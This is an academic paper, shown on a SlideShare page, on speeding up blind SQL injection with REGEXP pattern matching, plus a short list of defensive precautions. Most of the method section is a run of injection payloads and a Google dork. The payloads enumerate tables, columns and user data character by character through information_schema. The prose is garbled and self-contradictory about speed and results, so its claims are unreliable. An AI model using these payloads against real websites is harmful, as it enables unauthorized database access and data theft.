SlideShare a Scribd company logo
1 of 4
Download to read offline
International Journal of Trend in Scientific Research and Development (IJTSRD)
Volume 5 Issue 5, July-August 2021 Available Online: www.ijtsrd.com e-ISSN: 2456 – 6470
@ IJTSRD | Unique Paper ID – IJTSRD46336 | Volume – 5 | Issue – 5 | Jul-Aug 2021 Page 2353
Appreciative Advanced Blind SQLI Attack
Megha Yadav1
, Ms. Shalini Bhadola2
, Ms. Kirti Bhatia2
, Rohini Sharma3
1
Master of Technology in Computer Science, MDU, Rohtak, Haryana, India
2
Depatrment of Computer Science & Engineering, Sat kabir Institute of
Technology and Management, MDU, Rohtak, Haryana, India
3
Assistant Professor, Government College for Women Rohtak, Haryana, India
ABSTRACT
We are no longer faced with a new threats to our web applications
from SQL injection attacks, and the number of attacks is steadily
declining as users become more aware of the risks. Almost all web
applications are still vulnerable to advanced SQL injection attacks. A
regular expression-based query structure in this paper describes a
new method for transforming blind SQL injection into a more
effective and faster technique than traditional blind SQL injection.
When we understand the cause of an attack, we are able to find more
effective treatment.
KEYWORDS: Enhanced SQL Injection, Blind SQL Injection, Regular
expressions attack, Input validation
How to cite this paper: Megha Yadav |
Ms. Shalini Bhadola | Ms. Kirti Bhatia |
Rohini Sharma "Appreciative Advanced
Blind SQLI Attack" Published in
International
Journal of Trend in
Scientific Research
and Development
(ijtsrd), ISSN: 2456-
6470, Volume-5 |
Issue-5, August
2021, pp.2353-
2356, URL:
www.ijtsrd.com/papers/ijtsrd46336.pdf
Copyright © 2021 by author (s) and
International Journal of Trend in
Scientific Research and Development
Journal. This is an
Open Access article
distributed under the
terms of the Creative Commons
Attribution License (CC BY 4.0)
(http://creativecommons.org/licenses/by/4.0)
INTRODUCTION
Our first discussion has been on simple SQL
injections. When databases started flourishing on the
web, SQL injections followed. A database attack is
described as one that accesses the database through
unauthorized means such as URLs or input methods
in order to show or connect the data to a client.
Therefore, it is primarily due to error coding by
developers who failed to parameterize the input data
or to implement a security check and have accepted
input data from clients that was subject to
modification, extraction, or deletion.
These attackers use advance Google search to find
SQLI-vulnerable websites to launch attacks. If any
error arises as a result of this modification, the
website is considered vulnerable during vulnerability
tests. Attackers pass extra data or alter current URLs
to make the backend query different.
We are able to conduct blind SQLinjection attacks on
applications that do not return error messages.
1. Finding vulnerable websites:
Searching SQLI vulnerable websites, which can be
difficult when we choose one specific website to
attack or find a number of websites all at once, can be
done very well with Google dorks A few examples:
We enter the following query in the Google search
box
site:.com inurl:.php?id=
All websites that are requesting data from the
database using ID will be listed here and satisfying
our criteria.
To retrieve data from a database, the WHERE clause
of web applications uses client-supplied input to
query SQL databases. You can determine if the
application is susceptible to SQL injection, a SQL
statement with multiple conditions and subsequent
evaluation of the application's output. We determine
the type of attack based on finding vulnerabilities.
Suppose you want to access a company's products via
this URL:
IJTSRD46336
International Journal of Trend in Scientific Research and Development @ www.ijtsrd.com eISSN: 2456-6470
@ IJTSRD | Unique Paper ID – IJTSRD46336 | Volume – 5 | Issue – 5 | Jul-Aug 2021 Page 2354
http://www.abc.com/xyz.php?productID=35
The developers would, for example, use this SQL
query to fetch information from the website
SELECT * from products where product id=35
The products will be retrieved from the database and
displayed on the site:
Inject a true condition into the WHERE clause to
determine if the application is vulnerable descriptor
injections.
The URL is requested if
http://www.a.com/xyz.php?news=35and5=5—
You will need to submit a new query
The news where * appears news id=35 and 5=5
so, This shows a vulnerability to SQL injection if the
same page is returned from the query. SQL code is
interpreted from input provided by the user.
If the request is made to a secure application, the
value "5 and 1=1" will cause a type mismatch, so the
application will reject the request. There was no press
release on the server.
2. Improved blind SQL injection using regular
expression
Expending REGEXP, our search norms are binary,
since it gives options from A-Z, so we keep searching
until we do not find the exact word. So the attack is a
mix between guessing and binary searching. Our
binary search algorithm reduces search time by half
compared to regular blind attacks, or we can say that
we are saving time immediately when the algorithm
reduces the searches.
2.1. REGEXP attack's methodology
This is a method of extracting information from
databases fast. The simplicity of its methodology
allows us to save a lot of time and bandwidth. Our
REGEXP (My SQL) or LIKE (MSSQL) functions
match a range of numbers, characters, and special
characters. The REGEXP operator is used to match
patterns with regular expressions. For complex
searches, this feature offers a powerful method of
specifying patterns. So basically, this attack exploits a
pattern match method in My SQL, or if we were
using MSSQL we would be able to use the LIKE
function, but for complex data searches REGEXP is
the more powerful function. A quick example would
be helpful.
2.2. Finding if tables are present in database
Initially we check if the database contains tables or
not by employing the subsequent blind attack if it
does not change the web page then it has tables, the
error output will indicate whether it has many tables;
should it appear to be without tables, other sorts of
SQL assaults can be studied using the error provided.
INFORMATION_SCHEMA is a set of views that
permit us to extract metadata from objects within a
database, and therefore can be used to guess and
search user-created tables in a database.
http://www.abc.com/daily/content.php?id=85019 and
1=(select 1 from information_schema.
table_constraints limit 0,1) --
The TABLE_CONSTRAINTS has been used along
with INFORMATION_SCHEMA to restrict data
access by providing only user-made tables so that the
attacker won't have many default tables to access. The
next step is to look for these available tables in the
database and then test them.
2.3. Extracting table name
Following that, we use guess method to find table
names, for instance if we believe there will be a
database called USER, then initially we use U and
others in regexprange to determine the precise name
of the table. Depending on the attack type, the
attacker may guess the name of the table containing a
username or password indicating which table to
access.
http://www.abc.com/daily/content.php?id=85019 and
1=(select 1 from
information_schema.table_constraints where
table_name regexp ‘^[a-z]’ limit 0,1) –
A-Z range was used to search for table name in
previous query, our table name would then begin if
the test results are true. By using an alphabet and
separating the range into two sets, A-M and N-Z, we
keep reiterating the search query until we get the first
letter of our table name even if we have trouble
finding the letter. In this example, we identifythat the
first complemented record in the database starts with
a char between [a -> z]; the following code
demonstrates how to retrieve the full name of the
record [1]:
http://www.abc.com/daily/content.php?id=85019 and
1=(select 1 from
information_schema.table_constraints where
table_name regexp ‘^u[a-z]’ limit 0,1) –
When we find first character then we are going to
follow the same way to find subsequent characters so
if next query returns true we are going to try it.
http://www.abc.com/daily/content.php?id=85019 and
1=(select 1 from
information_schema.table_constraints where
table_name regexp ‘^us[a-z]’ limit 0,1) –
Similarly we follow till we don’t get FALSE
International Journal of Trend in Scientific Research and Development @ www.ijtsrd.com eISSN: 2456-6470
@ IJTSRD | Unique Paper ID – IJTSRD46336 | Volume – 5 | Issue – 5 | Jul-Aug 2021 Page 2355
http://www.abc.com/daily/content.php?id=85019 and
1=(select 1 from
information_schema.table_constraints where
table_name regexp ‘^users[a-z]’ limit 0,1) –
We extracted the table name USERS from above's
query as there is no table named USERS. We can
simply use the search method instead of the guess and
search method, where the REGEXP range keeps
fading in and out until not a word is found, we can
use the truncated version.
2.4. Extracting Column name
The following query results in the column names for
our table after we have guessed the table name and
searched for it
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from information_schema.columns where
table_name=access and column_name regexp '^[a-z]'
limit 0,1) –
So we can either predict and explore or use REGEXP
to do a straight search. We solely used search without
making any guesses, thus after the first real query, we
separated it from the centre and continued looking for
the exact term, just like our table guesses.
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from information_schema.columns where
table_name=access and column_name regexp '^[a-m]'
limit 0,1) –
If the result of the above query comes true we divide
it further
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from information_schema.columns where
table_name=access and column_name regexp '^[a-f]'
limit 0,1) –
True
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from information_schema.columns where
table_name=access and column_name regexp '^[a-c]'
limit 0,1) –
False
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from information_schema.columns where
table_name=access and column_name regexp '^[d-f]'
limit 0,1) –
True
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from information_schema.columns where
table_name=access and column_name regexp '^[f]'
limit 0,1) –
True
Having found the first letter'f', the same can be done
with other letters, but by changing our limit, we can
determine if another table starts with the same letter.
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from information_schema.columns where
table_name=access and column_name regexp '^[f]'
limit 1,1) –
False
There are no more tables that start with 'f'. From now
on we must change the regular expression like this:
'^f[a-z]' -> '^fi[a-z]' -> '^fir[a-z]' -> '^first[a-z]' ->
FALSE
Our table name, which we will use thereafter, is what
we get when we get FALSE in the end. After finding
the first character, the expression is repeated several
times in order to obtain the complete table name.
2.5. Extracting value from database
While following the same method, we now have
access to the name of the column and the ability,
making it easier to extract values from our columns
now that we have all the basic information about our
database.
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from users where First regexp '^[a-z]'
limit 0,1) –
True
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from users where First regexp '^[a-m]'
limit 0,1) --
False
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from users where First regexp '^[n-z]'
limit 0,1) --
True
www.abc.com/daily/content.php?id=85019 and
1=(select 1 from users where First regexp '^[t-z]' limit
0,1) --
True
Since LIMIT and REGEXP are not present in
MSSQL, this makes attacking MSSQL more
complicated. TOP and LIKE are the ways to bypass
it. [1]
3. Precautions
When it comes to SQL attacks, prevention is better
than cure. As we know, it is developer's errors or
ignorance in input validation that leads to most of
International Journal of Trend in Scientific Research and Development @ www.ijtsrd.com eISSN: 2456-6470
@ IJTSRD | Unique Paper ID – IJTSRD46336 | Volume – 5 | Issue – 5 | Jul-Aug 2021 Page 2356
SQLI attacks. As for advanced SQLI attack security,
a few precautions are critical for our web
applications.
1. Validation of input before it is processed: This is
an input filtration method for detecting or
verifying unauthorized entries before they are
processed by the application.
2. Checking Input Type: This step can be easily
accomplished by developers, but it prevents input
types from being entered incorrectly or
maliciously into our input boxes. [2]
3. Escape database Meta characters: Database Meta
characters can be escaped by prepending or
preceding them. [2]
4. Making sure the query string and headers are
correctly passed to our database. [2]
5. Parameterized Queries: By using parameterized
queries, you can protect yourself from SQL
injections.
4. Evaluation of normal Vs REGEXP base blind
SQLI attack
IHTEAM's paper makes it very clear that MD5 is the
case. An SQL injection blindly exports a 32-character
hash. In an optimistic event, Regexp and normal blind
should perform 32 queries despite the fact that the
number of characters is only 16 (1234567890abcdef).
[1]
Compared to normal SQLI attacks, Regexp Blind
SQLI Attack needs one hundred times more time to
complete[1] as opposed to standard SQLI attacks. By
contrast, the advanced SQLI attack will prove much
quicker than the ordinary attacks when compared to
the standard ones. As developers are in the early
stages of developing their website, they usually focus
on simple security measures such as blind SQLI with
regexp when targeting web addresses with no time
limit. It may be difficult, however, for attackers to
perform blind SQLI if they are searching for mass
attacks.
5. Conclusion
We found that by comparing REGEXP base to blind
SQL that this new method works well for hacking.
Because advanced attacks such as SQLI don't care for
hidden database errors, we have to build database
files that are safer and more secure. According to
other references, MORE_SCHEMA consistently
approached more concise results with a more
straightforward approach than the defaulting
INFORMATION_SCHEMA method.
References
[1] Blind Sql Injection with Regular Expressions
Attack: IHTEAM
[2] Full MSSQL Injection PWNage: ZeQ3uL &&
JabAv0C cwh.citec.us
[3] Guimarães, B. D., "Advanced SQL Injection to
Operating System Full Control," Black Hat
Europe, white paper, April 2009
[4] Sagar Joshi (2005): SQL injection attack and
defense: Web Application and SQL injection.
http://www.securitydocs.com/library/3587
[5] William G.J. Halfond, Jeremy Viegas, and
Alessandro Orso (2006): A Classification of
SQL Injection Attacks and Countermeasures.
IEEE Conference.
[6] "SQL Injection Are Your Web Applications
Vulnerable?". SPI Dynamics. 2002.
[7] http://www.spidynamics.com/papers/SQLInject
ionWhitePaper.pdf

More Related Content

What's hot

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 

What's hot (20)

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Sql injection
Sql injectionSql injection
Sql injection
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy Queries
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy Queries
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Sql injection
Sql injectionSql injection
Sql injection
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injection
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
Sql injection
Sql injectionSql injection
Sql injection
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 

Similar to Appreciative Advanced Blind SQLI Attack

Understanding advanced blind sqli attack
Understanding advanced blind sqli attackUnderstanding advanced blind sqli attack
Understanding advanced blind sqli attackNguyễn Đoàn
 
Devoid Web Application From SQL Injection Attack
Devoid Web Application From SQL Injection AttackDevoid Web Application From SQL Injection Attack
Devoid Web Application From SQL Injection AttackIJRESJOURNAL
 
A Study on Detection and Prevention of SQL Injection Attack
A Study on Detection and Prevention of SQL Injection AttackA Study on Detection and Prevention of SQL Injection Attack
A Study on Detection and Prevention of SQL Injection AttackIRJET Journal
 
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-SiteSQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Siteijtsrd
 
Literature Survey on Web based Recognition of SQL Injection Attacks
Literature Survey on Web based Recognition of SQL Injection AttacksLiterature Survey on Web based Recognition of SQL Injection Attacks
Literature Survey on Web based Recognition of SQL Injection AttacksIRJET Journal
 
Ijeee 51-57-preventing sql injection attacks in web application
Ijeee 51-57-preventing sql injection attacks in web applicationIjeee 51-57-preventing sql injection attacks in web application
Ijeee 51-57-preventing sql injection attacks in web applicationKumar Goud
 
Railsplitter: Simplify Your CRUD
Railsplitter: Simplify Your CRUDRailsplitter: Simplify Your CRUD
Railsplitter: Simplify Your CRUDFlurry, Inc.
 
SECURE: An Ameliorated SQL Semiotic for Security
SECURE: An Ameliorated SQL Semiotic for SecuritySECURE: An Ameliorated SQL Semiotic for Security
SECURE: An Ameliorated SQL Semiotic for SecurityEswar Publications
 
IRJET- An Efficient Technique for Finding SQL Injection using Reverse Proxy S...
IRJET- An Efficient Technique for Finding SQL Injection using Reverse Proxy S...IRJET- An Efficient Technique for Finding SQL Injection using Reverse Proxy S...
IRJET- An Efficient Technique for Finding SQL Injection using Reverse Proxy S...IRJET Journal
 
Detection of Structured Query Language Injection Attacks Using Machine Learni...
Detection of Structured Query Language Injection Attacks Using Machine Learni...Detection of Structured Query Language Injection Attacks Using Machine Learni...
Detection of Structured Query Language Injection Attacks Using Machine Learni...AIRCC Publishing Corporation
 
Overview on SQL Injection Attacks
Overview on SQL Injection AttacksOverview on SQL Injection Attacks
Overview on SQL Injection Attacksijsrd.com
 
SQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmSQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmIOSR Journals
 
The International Journal of Engineering and Science (The IJES)
The International Journal of Engineering and Science (The IJES)The International Journal of Engineering and Science (The IJES)
The International Journal of Engineering and Science (The IJES)theijes
 
Prevention of SQL injection in E- Commerce
Prevention of SQL injection in E- CommercePrevention of SQL injection in E- Commerce
Prevention of SQL injection in E- Commerceijceronline
 

Similar to Appreciative Advanced Blind SQLI Attack (20)

Understanding advanced blind sqli attack
Understanding advanced blind sqli attackUnderstanding advanced blind sqli attack
Understanding advanced blind sqli attack
 
SQL Injection - Newsletter
SQL Injection - NewsletterSQL Injection - Newsletter
SQL Injection - Newsletter
 
Devoid Web Application From SQL Injection Attack
Devoid Web Application From SQL Injection AttackDevoid Web Application From SQL Injection Attack
Devoid Web Application From SQL Injection Attack
 
A Study on Detection and Prevention of SQL Injection Attack
A Study on Detection and Prevention of SQL Injection AttackA Study on Detection and Prevention of SQL Injection Attack
A Study on Detection and Prevention of SQL Injection Attack
 
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-SiteSQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
SQL Injection Attack Detection and Prevention Techniques to Secure Web-Site
 
Literature Survey on Web based Recognition of SQL Injection Attacks
Literature Survey on Web based Recognition of SQL Injection AttacksLiterature Survey on Web based Recognition of SQL Injection Attacks
Literature Survey on Web based Recognition of SQL Injection Attacks
 
Ijeee 51-57-preventing sql injection attacks in web application
Ijeee 51-57-preventing sql injection attacks in web applicationIjeee 51-57-preventing sql injection attacks in web application
Ijeee 51-57-preventing sql injection attacks in web application
 
ieee
ieeeieee
ieee
 
Web application security
Web application securityWeb application security
Web application security
 
Railsplitter: Simplify Your CRUD
Railsplitter: Simplify Your CRUDRailsplitter: Simplify Your CRUD
Railsplitter: Simplify Your CRUD
 
SECURE: An Ameliorated SQL Semiotic for Security
SECURE: An Ameliorated SQL Semiotic for SecuritySECURE: An Ameliorated SQL Semiotic for Security
SECURE: An Ameliorated SQL Semiotic for Security
 
IRJET- An Efficient Technique for Finding SQL Injection using Reverse Proxy S...
IRJET- An Efficient Technique for Finding SQL Injection using Reverse Proxy S...IRJET- An Efficient Technique for Finding SQL Injection using Reverse Proxy S...
IRJET- An Efficient Technique for Finding SQL Injection using Reverse Proxy S...
 
Detection of Structured Query Language Injection Attacks Using Machine Learni...
Detection of Structured Query Language Injection Attacks Using Machine Learni...Detection of Structured Query Language Injection Attacks Using Machine Learni...
Detection of Structured Query Language Injection Attacks Using Machine Learni...
 
Ijcet 06 10_005
Ijcet 06 10_005Ijcet 06 10_005
Ijcet 06 10_005
 
Overview on SQL Injection Attacks
Overview on SQL Injection AttacksOverview on SQL Injection Attacks
Overview on SQL Injection Attacks
 
E017131924
E017131924E017131924
E017131924
 
SQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmSQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive Algorithm
 
The International Journal of Engineering and Science (The IJES)
The International Journal of Engineering and Science (The IJES)The International Journal of Engineering and Science (The IJES)
The International Journal of Engineering and Science (The IJES)
 
Prevention of SQL injection in E- Commerce
Prevention of SQL injection in E- CommercePrevention of SQL injection in E- Commerce
Prevention of SQL injection in E- Commerce
 
IJET-V3I2P2
IJET-V3I2P2IJET-V3I2P2
IJET-V3I2P2
 

More from ijtsrd

‘Six Sigma Technique’ A Journey Through its Implementation
‘Six Sigma Technique’ A Journey Through its Implementation‘Six Sigma Technique’ A Journey Through its Implementation
‘Six Sigma Technique’ A Journey Through its Implementationijtsrd
 
Edge Computing in Space Enhancing Data Processing and Communication for Space...
Edge Computing in Space Enhancing Data Processing and Communication for Space...Edge Computing in Space Enhancing Data Processing and Communication for Space...
Edge Computing in Space Enhancing Data Processing and Communication for Space...ijtsrd
 
Dynamics of Communal Politics in 21st Century India Challenges and Prospects
Dynamics of Communal Politics in 21st Century India Challenges and ProspectsDynamics of Communal Politics in 21st Century India Challenges and Prospects
Dynamics of Communal Politics in 21st Century India Challenges and Prospectsijtsrd
 
Assess Perspective and Knowledge of Healthcare Providers Towards Elehealth in...
Assess Perspective and Knowledge of Healthcare Providers Towards Elehealth in...Assess Perspective and Knowledge of Healthcare Providers Towards Elehealth in...
Assess Perspective and Knowledge of Healthcare Providers Towards Elehealth in...ijtsrd
 
The Impact of Digital Media on the Decentralization of Power and the Erosion ...
The Impact of Digital Media on the Decentralization of Power and the Erosion ...The Impact of Digital Media on the Decentralization of Power and the Erosion ...
The Impact of Digital Media on the Decentralization of Power and the Erosion ...ijtsrd
 
Online Voices, Offline Impact Ambedkars Ideals and Socio Political Inclusion ...
Online Voices, Offline Impact Ambedkars Ideals and Socio Political Inclusion ...Online Voices, Offline Impact Ambedkars Ideals and Socio Political Inclusion ...
Online Voices, Offline Impact Ambedkars Ideals and Socio Political Inclusion ...ijtsrd
 
Problems and Challenges of Agro Entreprenurship A Study
Problems and Challenges of Agro Entreprenurship A StudyProblems and Challenges of Agro Entreprenurship A Study
Problems and Challenges of Agro Entreprenurship A Studyijtsrd
 
Comparative Analysis of Total Corporate Disclosure of Selected IT Companies o...
Comparative Analysis of Total Corporate Disclosure of Selected IT Companies o...Comparative Analysis of Total Corporate Disclosure of Selected IT Companies o...
Comparative Analysis of Total Corporate Disclosure of Selected IT Companies o...ijtsrd
 
The Impact of Educational Background and Professional Training on Human Right...
The Impact of Educational Background and Professional Training on Human Right...The Impact of Educational Background and Professional Training on Human Right...
The Impact of Educational Background and Professional Training on Human Right...ijtsrd
 
A Study on the Effective Teaching Learning Process in English Curriculum at t...
A Study on the Effective Teaching Learning Process in English Curriculum at t...A Study on the Effective Teaching Learning Process in English Curriculum at t...
A Study on the Effective Teaching Learning Process in English Curriculum at t...ijtsrd
 
The Role of Mentoring and Its Influence on the Effectiveness of the Teaching ...
The Role of Mentoring and Its Influence on the Effectiveness of the Teaching ...The Role of Mentoring and Its Influence on the Effectiveness of the Teaching ...
The Role of Mentoring and Its Influence on the Effectiveness of the Teaching ...ijtsrd
 
Design Simulation and Hardware Construction of an Arduino Microcontroller Bas...
Design Simulation and Hardware Construction of an Arduino Microcontroller Bas...Design Simulation and Hardware Construction of an Arduino Microcontroller Bas...
Design Simulation and Hardware Construction of an Arduino Microcontroller Bas...ijtsrd
 
Sustainable Energy by Paul A. Adekunte | Matthew N. O. Sadiku | Janet O. Sadiku
Sustainable Energy by Paul A. Adekunte | Matthew N. O. Sadiku | Janet O. SadikuSustainable Energy by Paul A. Adekunte | Matthew N. O. Sadiku | Janet O. Sadiku
Sustainable Energy by Paul A. Adekunte | Matthew N. O. Sadiku | Janet O. Sadikuijtsrd
 
Concepts for Sudan Survey Act Implementations Executive Regulations and Stand...
Concepts for Sudan Survey Act Implementations Executive Regulations and Stand...Concepts for Sudan Survey Act Implementations Executive Regulations and Stand...
Concepts for Sudan Survey Act Implementations Executive Regulations and Stand...ijtsrd
 
Towards the Implementation of the Sudan Interpolated Geoid Model Khartoum Sta...
Towards the Implementation of the Sudan Interpolated Geoid Model Khartoum Sta...Towards the Implementation of the Sudan Interpolated Geoid Model Khartoum Sta...
Towards the Implementation of the Sudan Interpolated Geoid Model Khartoum Sta...ijtsrd
 
Activating Geospatial Information for Sudans Sustainable Investment Map
Activating Geospatial Information for Sudans Sustainable Investment MapActivating Geospatial Information for Sudans Sustainable Investment Map
Activating Geospatial Information for Sudans Sustainable Investment Mapijtsrd
 
Educational Unity Embracing Diversity for a Stronger Society
Educational Unity Embracing Diversity for a Stronger SocietyEducational Unity Embracing Diversity for a Stronger Society
Educational Unity Embracing Diversity for a Stronger Societyijtsrd
 
Integration of Indian Indigenous Knowledge System in Management Prospects and...
Integration of Indian Indigenous Knowledge System in Management Prospects and...Integration of Indian Indigenous Knowledge System in Management Prospects and...
Integration of Indian Indigenous Knowledge System in Management Prospects and...ijtsrd
 
DeepMask Transforming Face Mask Identification for Better Pandemic Control in...
DeepMask Transforming Face Mask Identification for Better Pandemic Control in...DeepMask Transforming Face Mask Identification for Better Pandemic Control in...
DeepMask Transforming Face Mask Identification for Better Pandemic Control in...ijtsrd
 
Streamlining Data Collection eCRF Design and Machine Learning
Streamlining Data Collection eCRF Design and Machine LearningStreamlining Data Collection eCRF Design and Machine Learning
Streamlining Data Collection eCRF Design and Machine Learningijtsrd
 

More from ijtsrd (20)

‘Six Sigma Technique’ A Journey Through its Implementation
‘Six Sigma Technique’ A Journey Through its Implementation‘Six Sigma Technique’ A Journey Through its Implementation
‘Six Sigma Technique’ A Journey Through its Implementation
 
Edge Computing in Space Enhancing Data Processing and Communication for Space...
Edge Computing in Space Enhancing Data Processing and Communication for Space...Edge Computing in Space Enhancing Data Processing and Communication for Space...
Edge Computing in Space Enhancing Data Processing and Communication for Space...
 
Dynamics of Communal Politics in 21st Century India Challenges and Prospects
Dynamics of Communal Politics in 21st Century India Challenges and ProspectsDynamics of Communal Politics in 21st Century India Challenges and Prospects
Dynamics of Communal Politics in 21st Century India Challenges and Prospects
 
Assess Perspective and Knowledge of Healthcare Providers Towards Elehealth in...
Assess Perspective and Knowledge of Healthcare Providers Towards Elehealth in...Assess Perspective and Knowledge of Healthcare Providers Towards Elehealth in...
Assess Perspective and Knowledge of Healthcare Providers Towards Elehealth in...
 
The Impact of Digital Media on the Decentralization of Power and the Erosion ...
The Impact of Digital Media on the Decentralization of Power and the Erosion ...The Impact of Digital Media on the Decentralization of Power and the Erosion ...
The Impact of Digital Media on the Decentralization of Power and the Erosion ...
 
Online Voices, Offline Impact Ambedkars Ideals and Socio Political Inclusion ...
Online Voices, Offline Impact Ambedkars Ideals and Socio Political Inclusion ...Online Voices, Offline Impact Ambedkars Ideals and Socio Political Inclusion ...
Online Voices, Offline Impact Ambedkars Ideals and Socio Political Inclusion ...
 
Problems and Challenges of Agro Entreprenurship A Study
Problems and Challenges of Agro Entreprenurship A StudyProblems and Challenges of Agro Entreprenurship A Study
Problems and Challenges of Agro Entreprenurship A Study
 
Comparative Analysis of Total Corporate Disclosure of Selected IT Companies o...
Comparative Analysis of Total Corporate Disclosure of Selected IT Companies o...Comparative Analysis of Total Corporate Disclosure of Selected IT Companies o...
Comparative Analysis of Total Corporate Disclosure of Selected IT Companies o...
 
The Impact of Educational Background and Professional Training on Human Right...
The Impact of Educational Background and Professional Training on Human Right...The Impact of Educational Background and Professional Training on Human Right...
The Impact of Educational Background and Professional Training on Human Right...
 
A Study on the Effective Teaching Learning Process in English Curriculum at t...
A Study on the Effective Teaching Learning Process in English Curriculum at t...A Study on the Effective Teaching Learning Process in English Curriculum at t...
A Study on the Effective Teaching Learning Process in English Curriculum at t...
 
The Role of Mentoring and Its Influence on the Effectiveness of the Teaching ...
The Role of Mentoring and Its Influence on the Effectiveness of the Teaching ...The Role of Mentoring and Its Influence on the Effectiveness of the Teaching ...
The Role of Mentoring and Its Influence on the Effectiveness of the Teaching ...
 
Design Simulation and Hardware Construction of an Arduino Microcontroller Bas...
Design Simulation and Hardware Construction of an Arduino Microcontroller Bas...Design Simulation and Hardware Construction of an Arduino Microcontroller Bas...
Design Simulation and Hardware Construction of an Arduino Microcontroller Bas...
 
